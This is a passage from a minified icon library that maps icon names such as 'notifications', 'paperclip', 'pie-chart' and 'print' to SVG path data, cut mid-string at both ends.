.01-.03.01-.04.05-.14.09-.27.12-.4.27-.06.43-.36.49-.63.06-.11.19-.39.16-.7-.04-.41-.2-.6-.38-.68v-.07c0-.51-.05-1.25-.14-1.74-.02-.13-.05-.27-.09-.4-.17-.6-.53-1.14-1.01-1.52C7.66 3.2 6.96 3 6.33 3c-.62 0-1.33.2-1.82.59-.49.38-.85.92-1.02 1.52-.04.13-.07.26-.09.4-.09.49-.13 1.23-.13 1.74v.06c-.19.08-.35.27-.39.68-.03.31.1.59.16.7.06.28.22.59.5.64.03.14.07.27.11.4 0 .01.01.02.01.02v.01c.22.59.55 1.1.96 1.46 0 .06-.01.12-.01.17-.04.44.08.76-1.09 1.29-1.17.53-2.93 1.1-3.29 1.95-.35.87-.2 1.37-.2 1.37h12.6s.15-.5-.22-1.36c-.36-.85-2.12-1.42-3.29-1.95zM14.89 2h-1V1c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1V4h1c.55 0 1-.45 1-1s-.45-1-1-1z"],"new-prescription":["M9.82 11.66l2.48-2.87c.12-.2.13-.37.04-.53-.11-.19-.3-.26-.52-.26h-1.29c-.27 0-.49.13-.63.34L8.44 9.9 6.95 8a.482.482 0 0 0-.08-.1L5.82 6.55c.57-.24 1.04-.57 1.42-1.01.49-.57.74-1.27.74-2.08 0-.51-.1-.99-.32-1.42-.21-.43-.51-.8-.89-1.11A4.1 4.1 0 0 0 5.42.24C4.91.08 4.34 0 3.72 0H.61C.26 0 0 .23 0 .56v9.89c0 .33.26.55.61.55h.8c.36 0 .61-.23.61-.56V6.99H3.3l3.73 4.74-2.71 3.48c-.12.2-.13.37-.04.53.11.19.3.26.52.26h1.27c.27 0 .51-.12.64-.34l1.69-2.15 1.66 2.14c.12.21.34.35.62.35h1.43c.2 0 .39-.08.5-.25.12-.18.09-.38-.02-.55l-2.77-3.54zM4.18 5H1.99V2.02h2.19c.62 0 1.08.13 1.38.37.29.22.44.62.44 1.08 0 .45-.15.94-.44 1.17-.31.23-.76.36-1.38.36zM15 2h-1V1c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1V4h1c.55 0 1-.45 1-1s-.45-1-1-1zM9.99 3.01c0 .02.01.04.01.06V2.95c0 .02-.01.04-.01.06z"],"new-text-box":["M5 6.5c0 .28.22.5.5.5H7v3.5c0 .28.22.5.5.5s.5-.22.5-.5V7h1.5c.28 0 .5-.22.5-.5S9.78 6 9.5 6h-4c-.28 0-.5.22-.5.5zM15 2h-1V1c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1V4h1c.55 0 1-.45 1-1s-.45-1-1-1zm-2 5c-.55 0-1 .45-1 1v5H3V4h5c.55 0 1-.45 1-1s-.45-1-1-1H2c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h11c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1z"],ninja:["M16 5s-2.52 2.11-4.96 1.99C11.03 4.89 10.39.23 5 0c0 0 2.11 2.54 1.96 4.99C4.86 5.01.23 5.65 0 11c0 0 2.56-2.12 5.02-1.95.02 2.11.67 6.72 5.98 6.95 0 0-2.09-2.54-1.94-4.99 2.11-.02 6.71-.68 6.94-6.01zM8 9.5c-.83 0-1.5-.67-1.5-1.5S7.17 6.5 8 6.5s1.5.67 1.5 1.5S8.83 9.5 8 9.5z"],notifications:["M8 16c1.1 0 2-.9 2-2H6c0 1.1.9 2 2 2zm6-5c-.55 0-1-.45-1-1V6c0-2.43-1.73-4.45-4.02-4.9 0-.04.02-.06.02-.1 0-.55-.45-1-1-1S7 .45 7 1c0 .04.02.06.02.1A4.992 4.992 0 0 0 3 6v4c0 .55-.45 1-1 1s-1 .45-1 1 .45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1z"],"notifications-updated":["M8 16c1.1 0 2-.9 2-2H6c0 1.1.9 2 2 2zm3.399-13.667l-.413.412A2.99 2.99 0 0 0 9 1.99a3 3 0 0 0-3 2.99c0 .8.32 1.558.876 2.114l2.002 1.992A2.99 2.99 0 0 0 13 9.184V10c0 .55.45 1 1 1s1 .45 1 1-.45 1-1 1H2c-.55 0-1-.45-1-1s.45-1 1-1 1-.45 1-1V6c0-2.43 1.73-4.45 4.02-4.9 0-.04-.02-.06-.02-.1 0-.55.45-1 1-1s1 .45 1 1c0 .04-.02.06-.02.1a4.97 4.97 0 0 1 2.419 1.233zM10.29 7.67l-2-1.99a.99.99 0 0 1-.29-.7 1 1 0 0 1 1-.99c.27 0 .52.11.7.29l1.29 1.29 3.28-3.28c.18-.18.42-.29.7-.29.55 0 1 .44 1 .99 0 .28-.11.52-.3.7l-3.98 3.98a.99.99 0 0 1-1.4 0z"],"numbered-list":["M2.76 7h1.26V0h-.94c-.04.21-.12.39-.25.54-.13.15-.29.27-.48.36-.18.09-.39.16-.62.2-.23.04-.46.06-.71.06v.9h1.74V7zm-.59 7.17c.18-.12.37-.25.58-.37a10.763 10.763 0 0 0 1.24-.83c.2-.16.37-.33.52-.51.15-.19.28-.39.37-.61.09-.22.14-.47.14-.74 0-.22-.04-.45-.12-.7-.08-.26-.21-.49-.4-.69-.18-.21-.43-.39-.72-.52-.3-.14-.68-.21-1.12-.21-.41 0-.77.07-1.08.2-.32.14-.58.32-.8.56-.22.23-.38.51-.49.84-.11.32-.16.67-.16 1.05h1.19c.01-.24.03-.47.08-.67.05-.21.11-.39.21-.54.09-.15.22-.27.38-.36.16-.09.35-.13.59-.13.26 0 .47.04.63.12.16.08.29.18.38.3.09.12.15.25.18.39s.05.27.05.4c-.01.27-.08.5-.22.71-.14.21-.32.4-.53.57-.22.18-.45.34-.71.49-.26.15-.51.31-.74.47-.5.31-.89.68-1.17 1.11-.3.41-.44.91-.45 1.48h5v-1H1.43c.05-.15.14-.29.27-.43.14-.13.29-.26.47-.38zM15.01 1.99h-7c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-1c0-.55-.44-1-1-1zm0 9h-7c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-1c0-.55-.44-1-1-1z"],numerical:["M2.79 4.61c-.13.17-.29.3-.48.41-.18.11-.39.18-.62.23-.23.04-.46.07-.71.07v1.03h1.74V12h1.26V4h-.94c-.04.23-.12.44-.25.61zm4.37 5.31c.18-.14.37-.28.58-.42l.63-.45c.21-.16.41-.33.61-.51s.37-.38.52-.59c.15-.21.28-.45.37-.7.09-.25.13-.54.13-.85 0-.25-.04-.52-.12-.8-.07-.29-.2-.55-.39-.79a2.18 2.18 0 0 0-.73-.6c-.29-.15-.66-.23-1.11-.23-.41 0-.77.08-1.08.23-.31.16-.58.37-.79.64-.22.27-.38.59-.49.96-.11.37-.16.77-.16 1.2h1.19c.01-.27.03-.53.08-.77.04-.24.11-.45.21-.62.09-.18.22-.32.38-.42.16-.1.35-.15.59-.15.26 0 .47.05.63.14.15.09.28.21.37.35.09.14.15.29.18.45.03.16.05.31.05.45-.01.31-.08.58-.22.82-.14.23-.32.45-.53.65-.22.21-.46.39-.71.57-.26.18-.51.36-.75.54-.5.36-.89.78-1.17 1.27-.28.49-.43 1.06-.44 1.71h5v-1.15H6.43c.05-.17.14-.33.27-.49.13-.15.29-.29.46-.44zm8.5-1.56c-.23-.35-.54-.57-.95-.65v-.02c.34-.13.6-.34.76-.63.16-.29.24-.63.24-1.02 0-.34-.06-.64-.19-.9s-.3-.47-.51-.64c-.21-.17-.45-.3-.72-.38-.27-.09-.54-.13-.82-.13-.36 0-.68.07-.96.2-.28.13-.53.32-.72.55-.2.23-.36.51-.47.83-.11.32-.18.66-.19 1.04h1.15c-.01-.2.01-.39.06-.58.05-.19.12-.36.22-.51.1-.15.22-.27.37-.36.15-.09.32-.13.53-.13.32 0 .59.1.79.3.21.2.31.46.31.79 0 .23-.05.43-.14.59-.09.16-.21.29-.35.38-.15.09-.32.16-.51.19-.19.04-.38.05-.57.04v.93c.23-.01.45 0 .67.02.22.02.42.08.59.17.18.09.32.23.43.4.11.18.16.41.16.71 0 .44-.13.78-.39 1.02s-.58.36-.97.36c-.45 0-.79-.16-1.02-.47-.23-.31-.33-.7-.32-1.17H11c.01.4.06.77.17 1.1.11.33.26.61.47.85.21.23.46.42.77.54.31.13.67.19 1.08.19.34 0 .66-.05.96-.16.3-.11.57-.27.8-.47.23-.2.41-.45.55-.74.13-.27.2-.6.2-.97 0-.5-.11-.92-.34-1.27z"],office:["M15 5h-3V1c0-.55-.45-1-1-1H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h3v-4h4v4h7c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zM5 10H2V7h3v3zm0-5H2V2h3v3zm5 5H7V7h3v3zm0-5H7V2h3v3zm4 9h-2v-2h2v2zm0-4h-2V7h2v3z"],offline:["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zM6 14l1-5H4l6-7-1 5h3l-6 7z"],"oil-field":["M15 14h-1.35l-3.34-7.51 2.46-.95 1.45 3.21c.09.2.36.3.6.23.1-.03.18-.08.24-.15.05-.08 1.23-1.56.87-4.2-.11-.79-.52-4.62-3.26-4.62-.93 0-1.68.62-1.67 1.37 0 .14.03.28.09.42l.87 1.92L.64 8.07v.01A.98.98 0 0 0 0 9c0 .55.45 1 1 1 .13 0 .25-.03.36-.07v.01l1.04-.4L3.67 14H2c-.55 0-1 .45-1 1s.45 1 1 1h13c.55 0 1-.45 1-1s-.45-1-1-1zM4.27 8.81L7.14 7.7 5.2 12.08l-.93-3.27zM6.54 14L9 8.46 11.46 14H6.54z"],"one-column":["M11.99-.01h-3c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-14c0-.55-.45-1-1-1zm-6 5c-.28 0-.53.11-.71.29l-2 2a1.014 1.014 0 0 0 0 1.42l2 2a1.003 1.003 0 0 0 1.71-.71v-4c0-.55-.45-1-1-1z"],outdated:["M8 0c4.42 0 8 3.58 8 8 0 4.06-3.02 7.4-6.94 7.92-.02 0-.04.01-.06.01-.33.04-.66.07-1 .07-4.42 0-8-3.58-8-8 0-.55.45-1 1-1s1 .45 1 1c0 3.31 2.69 6 6 6 .71 0 1.37-.15 2-.38v.01c2.33-.82 4-3.02 4-5.63 0-3.31-2.69-6-6-6-1.78 0-3.36.78-4.46 2H5c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1V1c0-.55.45-1 1-1s1 .45 1 1v1.74A7.95 7.95 0 0 1 8 0zm1 12H7v-2h2v2zm0-3H7V4h2v5z"],"page-layout":["M15 .95H1c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-12c0-.55-.45-1-1-1zm-9 12H2v-6h4v6zm8 0H7v-6h7v6zm0-7H2v-3h12v3z"],"panel-stats":["M10 4h3v1h-3zM10 6h3v1h-3zM10 8h3v1h-3zM10 10h3v1h-3z","M15 1H1c-.6 0-1 .4-1 1v11c0 .6.4 1 1 1h14c.6 0 1-.4 1-1V2c0-.6-.4-1-1-1zM8 12H2V3h6v9zm6 0H9V3h5v9z"],"panel-table":["M15 1H1c-.6 0-1 .4-1 1v11c0 .6.4 1 1 1h14c.6 0 1-.4 1-1V2c0-.6-.4-1-1-1zM8 9H6V7h2v2zm0-3H6V4h2v2zm-6 6V3h3v9H2zm4 0v-2h2v2H6zm8 0H9v-2h5v2zm0-3H9V7h5v2zm0-3H9V4h5v2z"],paperclip:["M14.68 2.31A4.54 4.54 0 0 0 11.46.99c-1.15 0-2.31.44-3.19 1.32L.95 9.63c-.63.63-.95 1.46-.95 2.28a3.21 3.21 0 0 0 3.23 3.22c.83 0 1.66-.31 2.3-.95l7.31-7.32c.76-.77.76-1.98.01-2.73s-1.99-.76-2.75 0l-6.07 6.08c-.24.25-.24.65.01.9s.65.25.91.01l6.07-6.08c.25-.25.67-.25.91-.01.25.25.25.67 0 .92l-7.31 7.32c-.75.75-2.04.74-2.76.01-.75-.75-.73-2.02.01-2.76L9.2 3.21c1.24-1.24 3.35-1.26 4.58-.03 1.24 1.24 1.24 3.36 0 4.6l-7.12 7.13c-.24.25-.24.64.01.88.24.24.63.24.88.01v.01l7.13-7.13A4.41 4.41 0 0 0 16 5.51c0-1.16-.44-2.32-1.32-3.2z"],paragraph:["M13 1H6C3.8 1 2 2.8 2 5s1.8 4 4 4v5c0 .6.4 1 1 1s1-.5 1-1V3h2v11c0 .6.4 1 1 1s1-.5 1-1V3h1c.5 0 1-.4 1-1s-.4-1-1-1z"],path:["M14.5 0h-13C.67 0 0 .67 0 1.5S.67 3 1.5 3H7v3H3.5C2.67 6 2 6.67 2 7.5S2.67 9 3.5 9H7v3H5.5c-.83 0-1.5.67-1.5 1.5S4.67 15 5.5 15h5c.83 0 1.5-.67 1.5-1.5s-.67-1.5-1.5-1.5H9V9h3.5c.83 0 1.5-.67 1.5-1.5S13.33 6 12.5 6H9V3h5.5c.83 0 1.5-.67 1.5-1.5S15.33 0 14.5 0z"],"path-search":["M15 14.62l-4-2.4V9.77c-.32.09-.66.15-1 .18v2.27l-4 2.4V8.71c-.38-.31-.72-.66-1-1.06v6.97l-4-2.4V8c.55 0 1-.45 1-1s-.45-1-1-1V1.38l3.15 1.89c.08-.34.18-.66.32-.97L.76.07v.01A.496.496 0 0 0 .5 0C.22 0 0 .22 0 .5v12c0 .18.1.33.25.42v.01l5 3v-.01c.07.05.16.08.25.08s.18-.03.25-.08v.01l4.74-2.85 4.74 2.85v-.01c.09.05.18.08.27.08.28 0 .5-.22.5-.5v-3.78c-.3.17-.63.28-1 .28v2.62zM2 5c0 .55.45 1 1 1s1-.45 1-1-.45-1-1-1-1 .45-1 1zm6-1c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm7.75-.92l-1.19-.72c.18.43.29.9.36 1.38l.08.04v3.39l1 1V3.5c0-.18-.1-.33-.25-.42zM10 2c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm3.3 4.89c.44-.7.7-1.51.7-2.39C14 2.01 11.99 0 9.5 0S5 2.01 5 4.5 7.01 9 9.5 9c.88 0 1.69-.26 2.39-.7l2.41 2.41c.17.18.42.29.7.29a1.003 1.003 0 0 0 .71-1.71l-2.41-2.4zM9.5 8C7.57 8 6 6.43 6 4.5S7.57 1 9.5 1 13 2.57 13 4.5 11.43 8 9.5 8z"],pause:["M6 3H4c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1zm6 0h-2c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],people:["M13.69 13.98c-.05-.24-.14-.5-.25-.76-.36-.86-1.12-1.33-2.69-2-.14-.06-.59-.25-.6-.25-.21-.09-.36-.15-.5-.22.02-.1.02-.2.03-.31 0-.04.01-.08.01-.13-.07-.06-.13-.12-.19-.19.22-.32.4-.67.54-1.05.02-.06.02-.06.03-.1.29-.23.48-.57.59-.96.16-.33.25-.73.21-1.16-.03-.4-.16-.76-.37-1.03-.02-.53-.07-1.13-.15-1.54-.01-.06-.02-.12-.03-.19.23-.06.48-.09.72-.09.49 0 1.05.16 1.44.46.38.29.67.7.8 1.17.03.1.05.21.07.31.07.37.11.94.11 1.33v.05c.14.06.27.21.29.51.02.25-.07.45-.13.54-.05.21-.16.44-.38.48-.02.1-.05.2-.09.3 0 .01-.01.03-.01.03-.17.44-.43.83-.75 1.11v.14c.03.35-.09.59.83 1 .93.41 2.32.84 2.6 1.5.29.66.17 1.04.17 1.04h-2.3zm-1.17-.38c.37.86.22 1.36.22 1.36H.06s-.14-.5.22-1.36 2.13-1.43 3.31-1.96c1.17-.54 1.05-.86 1.09-1.3 0-.05.01-.11.01-.17-.41-.35-.75-.86-.97-1.45v-.01s-.01-.01-.01-.02c-.04-.12-.09-.26-.12-.39-.28-.05-.44-.36-.5-.64-.06-.12-.19-.39-.16-.71.04-.41.21-.6.39-.68v-.06c0-.51.05-1.26.14-1.74.02-.13.05-.27.09-.4.17-.6.54-1.13 1.02-1.51.5-.39 1.21-.6 1.84-.6s1.34.21 1.84.6c.48.38.85.91 1.02 1.52.04.13.07.27.09.4.09.48.14 1.22.14 1.73v.07c.18.08.34.27.37.67.03.32-.09.59-.16.71-.06.28-.21.58-.48.63-.03.13-.07.26-.12.39 0 .01-.01.04-.01.04-.22.58-.55 1.08-.95 1.45v.18c.04.45-.12.77 1.06 1.3 1.18.53 2.95 1.09 3.31 1.95z"],percentage:["M6 6V4c0-1.1-.9-2-2-2H3c-1.1 0-2 .9-2 2v2c0 1.1.9 2 2 2h1c1.1 0 2-.9 2-2zM3.5 6c-.28 0-.5-.22-.5-.5v-1c0-.28.22-.5.5-.5s.5.22.5.5v1c0 .28-.22.5-.5.5zM13 8h-1c-1.1 0-2 .9-2 2v2c0 1.1.9 2 2 2h1c1.1 0 2-.9 2-2v-2c0-1.1-.9-2-2-2zm0 3.5c0 .28-.22.5-.5.5s-.5-.22-.5-.5v-1c0-.28.22-.5.5-.5s.5.22.5.5v1zM12 3a1.003 1.003 0 0 0-1.87-.5l-5.99 9.98c-.09.15-.14.33-.14.52a1.003 1.003 0 0 0 1.87.5l5.99-9.98c.09-.15.14-.33.14-.52z"],person:["M15.68 14.32c-.46-1.05-2.68-1.75-4.16-2.4-1.48-.65-1.28-1.05-1.33-1.59-.01-.07-.01-.15-.01-.23.51-.45.92-1.07 1.19-1.78 0 0 .01-.04.02-.05.06-.15.11-.32.15-.48.34-.07.54-.44.61-.78.08-.14.23-.48.2-.87-.05-.5-.25-.73-.47-.82v-.09c0-.63-.06-1.55-.17-2.15A3.671 3.671 0 0 0 10.32.72C9.68.25 8.79-.01 8-.01c-.79 0-1.68.25-2.31.73-.61.47-1.06 1.13-1.28 1.86-.05.17-.09.33-.11.5-.12.6-.17 1.51-.17 2.15v.08c-.24.09-.45.32-.5.83-.03.38.13.72.2.86.08.35.28.72.63.78.04.17.09.33.15.49 0 .01.01.02.01.03l.01.01c.27.72.7 1.35 1.22 1.8 0 .07-.01.14-.01.21-.05.54.1.94-1.37 1.59-1.48.65-3.7 1.35-4.16 2.4-.46 1.05-.27 1.67-.27 1.67h15.92c-.01.01.18-.61-.28-1.66z"],phone:["M15.9 12.41c-.06-.06-3.37-2-3.48-2.05a.794.794 0 0 0-.32-.08c-.15 0-.34.11-.57.32-.23.22-.94 1.19-1.15 1.4-.21.22-.38.32-.52.32-.07 0-.15-.02-.25-.06-.1-.04-1.16-.58-3.36-2.52-2.2-1.93-2.49-3.2-2.5-3.55 0-.14.11-.31.32-.52.22-.21.45-.41.7-.6.25-.19.49-.4.7-.62.22-.23.32-.42.32-.57 0-.11-.03-.21-.08-.32C5.66 3.46 3.66.15 3.59.08 3.44-.07 2.85 0 2.55.16.16 1.46-.03 3.2 0 3.89c.04.71.49 4.46 4.16 7.95C8.72 16.17 11.89 16 12.1 16c.69 0 2.82-.38 3.72-2.55.13-.32.25-.87.08-1.04z"],"pie-chart":["M7 1.08c-3.37.5-5.97 3.4-5.97 6.92 0 3.87 3.13 7 6.98 7 3.52 0 6.42-2.61 6.91-6H7V1.08z","M8 0v8h8c0-4.42-3.58-8-8-8z"],pin:["M9.41.92c-.51.51-.41 1.5.15 2.56L4.34 7.54C2.8 6.48 1.45 6.05.92 6.58l3.54 3.54-3.54 4.95 4.95-3.54 3.54 3.54c.53-.53.1-1.88-.96-3.42l4.06-5.22c1.06.56 2.04.66 2.55.15L9.41.92z"],pivot:["M4.57 7.02L.3 11.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4.27-4.27c-.58-.35-1.07-.84-1.41-1.42zM15 8c-.55 0-1 .45-1 1v.59l-2.57-2.57c-.34.58-.83 1.07-1.41 1.41L12.59 11H12c-.55 0-1 .45-1 1s.45 1 1 1h3c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1zm-4-3c0-1.66-1.34-3-3-3S5 3.34 5 5s1.34 3 3 3 3-1.34 3-3zM8 6c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"pivot-table":["M2 4H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h1c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm0-4H1C.45 0 0 .45 0 1v1c0 .55.45 1 1 1h1c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm11.71 4.29C13.53 4.11 13.28 4 13 4s-.53.11-.71.29l-2 2a1.003 1.003 0 0 0 1.42 1.42l.29-.3V9c0 1.66-1.34 3-3 3H7.41l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H9c2.76 0 5-2.24 5-5V7.41l.29.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-2-2zM15 0H5c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],play:["M12 8c0-.35-.19-.64-.46-.82l.01-.02-6-4-.01.02A.969.969 0 0 0 5 3c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1 .21 0 .39-.08.54-.18l.01.02 6-4-.01-.02c.27-.18.46-.47.46-.82z"],plus:["M13 7H9V3c0-.55-.45-1-1-1s-1 .45-1 1v4H3c-.55 0-1 .45-1 1s.45 1 1 1h4v4c0 .55.45 1 1 1s1-.45 1-1V9h4c.55 0 1-.45 1-1s-.45-1-1-1z"],"polygon-filter":["M14 5c-.24 0-.47.05-.68.13L9.97 2.34c.01-.11.03-.22.03-.34 0-1.1-.9-2-2-2S6 .9 6 2c0 .04.01.08.01.12L2.88 4.21C2.61 4.08 2.32 4 2 4 .9 4 0 4.9 0 6c0 .74.4 1.38 1 1.72v4.55c-.6.35-1 .99-1 1.73 0 1.1.9 2 2 2 .74 0 1.38-.4 1.72-1h4.55c.35.6.98 1 1.72 1 1.1 0 2-.9 2-2 0-.37-.11-.7-.28-1L14 9c1.11-.01 2-.9 2-2s-.9-2-2-2zm-4.01 7c-.73 0-1.37.41-1.71 1H3.73c-.18-.3-.43-.55-.73-.72V7.72c.6-.34 1-.98 1-1.72 0-.04-.01-.08-.01-.12l3.13-2.09c.27.13.56.21.88.21.24 0 .47-.05.68-.13l3.35 2.79c-.01.11-.03.22-.03.34 0 .37.11.7.28 1l-2.29 4z"],power:["M8 8c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1S7 .45 7 1v6c0 .55.45 1 1 1zm3-5.32v2.34c1.21.91 2 2.35 2 3.98 0 2.76-2.24 5-5 5s-5-2.24-5-5c0-1.63.79-3.06 2-3.98V2.68C2.64 3.81 1 6.21 1 9c0 3.87 3.13 7 7 7s7-3.13 7-7c0-2.79-1.64-5.19-4-6.32z"],"predictive-analysis":["M16 6.41c0-1.01-.49-1.94-1.29-2.49-.43-1.92-2.07-3.28-4-3.28-.46 0-.92.08-1.35.24C8.83.31 8.11 0 7.34 0c-.9 0-1.74.44-2.28 1.16-.12-.01-.24-.02-.36-.02-1.31 0-2.42.89-2.77 2.17C.78 3.72 0 4.84 0 6.13c0 .38.07.76.21 1.12C.07 7.6 0 7.98 0 8.36c0 1.11.58 2.11 1.51 2.63.54.56 1.27.87 2.03.87.49 0 .95-.12 1.37-.36a2.85 2.85 0 0 0 2.18 1.04c.52 0 1.03-.14 1.47-.42.49.39 1.07.65 1.69.73 1.04 1.15 1.84 2.63 1.84 2.64 0 0 .28.49.26.49.77 0 1.41-.16 1.32-1.04 0 .02-.73-2.31-.73-2.31.41-.21.75-.55.97-.98.9-.52 1.47-1.53 1.47-2.61 0-.24-.03-.48-.08-.71.45-.52.7-1.21.7-1.92zm-1.23 1.02l-.15-.16-.61-.67c-.27-.29-.54-.94-.58-1.39l-.1-1.01c-.05-.59-.94-.58-.91.11 0 .02.1 1.01.1 1.01.03.29.12.62.24.93-.06-.01-.12-.02-.18-.02 0 0-2.06-.1-2.05-.11-.58-.02-.71.97-.04 1l2.05.11c.42.02 1.04.3 1.29.58l.49.54.02.05c.08.21.12.44.12.66 0 .74-.41 1.41-1.07 1.75l-.16.08-.07.18c-.15.38-.48.66-.88.74l-.54.11.7 2.2c-.38-.61-.95-1.43-1.62-2.14l-.12-.13-.17-.01c-.41-.03-.8-.17-1.14-.38l1.36-1.18c.35-.31.83-.44.99-.39 0 0 .63.17.62.18.63.16.83-.74.23-.97l-.62-.18c-.55-.16-1.33.18-1.79.58l-1.53 1.33-.31.26c-.35.29-.75.44-1.2.44-.64 0-1.23-.33-1.58-.86V9.15c0-.4.17-.79.27-.85 0 0 .52-.34.51-.35.71-.53.18-1.23-.49-.89 0-.01-.52.35-.52.35-.26.15-.45.44-.58.77-.11-.11-.22-.2-.34-.28 0 0-1.53-1.01-1.53-1.02-.65-.45-1.2.51-.49.89 0-.01 1.51 1.02 1.51 1.02.37.24.62.78.62 1.09v.67c-.34.19-.63.29-.99.29-.54 0-1.05-.23-1.41-.63l-.05-.06-.07-.04c-.65-.34-1.05-1-1.05-1.73 0-.3.07-.6.2-.87l.12-.25L1.15 7c-.13-.27-.2-.56-.2-.87 0-.9.61-1.68 1.48-1.89l.31-.08.05-.34a1.926 1.926 0 0 1 2.38-1.58l.32.08.18-.31c.35-.6.99-.97 1.67-.97.44 0 .86.15 1.2.42l-.36.36v-.01l-.25.26c-.33.27-.74.42-.89.4 0 0-.67-.1-.67-.11-.67-.13-.87.86-.14 1.02.01 0 .67.11.67.11.02 0 .05 0 .07.01-.11.37-.15.77-.1 1.12 0 0 .17.99.15.99.11.52 1.06.36.93-.18 0-.01-.15-.99-.15-.99-.05-.37.12-.94.36-1.19l.39-.4c.05-.05.1-.09.15-.14l.74-.76c.4-.18.83-.27 1.27-.27 1.55 0 2.86 1.12 3.11 2.67l.04.25.21.12c.61.35.98 1 .98 1.7 0 .36-.1.7-.28 1.01z"],prescription:["M10.91 8.34c.14-.21.36-.34.63-.34h1.29c.22 0 .41.07.52.26.09.16.08.33-.04.53l-2.49 2.87 2.77 3.54c.12.17.14.37.02.55-.11.17-.3.25-.5.25h-1.44a.69.69 0 0 1-.61-.35L9.4 13.51l-1.69 2.15c-.13.21-.36.34-.63.34H5.8c-.22 0-.41-.07-.52-.26-.09-.16-.08-.33.04-.53l2.71-3.48L4.3 6.99H3.03v3.47c0 .33-.26.56-.62.56h-.8c-.35-.01-.61-.23-.61-.56V.56c0-.33.26-.56.62-.56h3.11c.62 0 1.19.08 1.7.24.51.16.96.39 1.34.69a3.194 3.194 0 0 1 1.21 2.53c0 .81-.25 1.5-.74 2.08-.37.44-.84.77-1.42 1.01L7.88 7.9c.04.04.07.08.08.1l1.49 1.9 1.46-1.56zM5.18 5c.62 0 1.08-.13 1.39-.37.29-.23.44-.71.44-1.16s-.15-.87-.44-1.1C6.26 2.12 5.8 2 5.18 2H2.99v3h2.19z"],presentation:["M15 1H9c0-.55-.45-1-1-1S7 .45 7 1H1c-.55 0-1 .45-1 1s.45 1 1 1v8c0 .55.45 1 1 1h3.59L3.3 14.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L7 13.41V15c0 .55.45 1 1 1s1-.45 1-1v-1.59l2.29 2.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L10.41 12H14c.55 0 1-.45 1-1V3c.55 0 1-.45 1-1s-.45-1-1-1zm-2 9H3V3h10v7z"],print:["M12 2.02c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1v1h8v-1zm3 2H1c-.55 0-1 .45-1 1v6c0 .55.45 1 1 1h1v-3h12v3h1c.55 0 1-.45 1-1v-6c0-.56-.45-1-1-1zm-1 3h-2v-1h2v1zm-3 6H5v-3H3v4c0 .55.45 1 1 1h8c.55 0 1-.45 1-1v-4h-2v3z"],projects:["M14 3c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v1h12V3zm-2-3H4c-.55 0-1 .45-1 1h10c0-.55-.45-1-1-1zm3 5H1c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm-3 6c0 .55-.45 1-1 1H5c-.55 0-1-.45-1-1V9h1v2h6V9h1v2z"],properties:["M2 6C.9 6 0 6.9 0 8s.9 2 2 2 2-.9 2-2-.9-2-2-2zm4-3h9c.55 0 1-.45 1-1s-.45-1-1-1H6c-.55 0-1 .45-1 1s.45 1 1 1zm-4 9c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm13-5H6c-.55 0-1 .45-1 1s.45 1 1 1h9c.55 0 1-.45 1-1s-.45-1-1-1zm0 6H6c-.55 0-1 .45-1 1s.45 1 1 1h9c.55 0 1-.45 1-1s-.45-1-1-1zM2 0C.9 0 0 .9 0 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],property:["M3 12c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm-.5-6.5a2.5 2.5 0 0 0 0 5 2.5 2.5 0 0 0 0-5zM7 3h8c.55 0 1-.45 1-1s-.45-1-1-1H7c-.55 0-1 .45-1 1s.45 1 1 1zm8 10H7c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1zM3 0C1.9 0 1 .9 1 2s.9 2 2 2 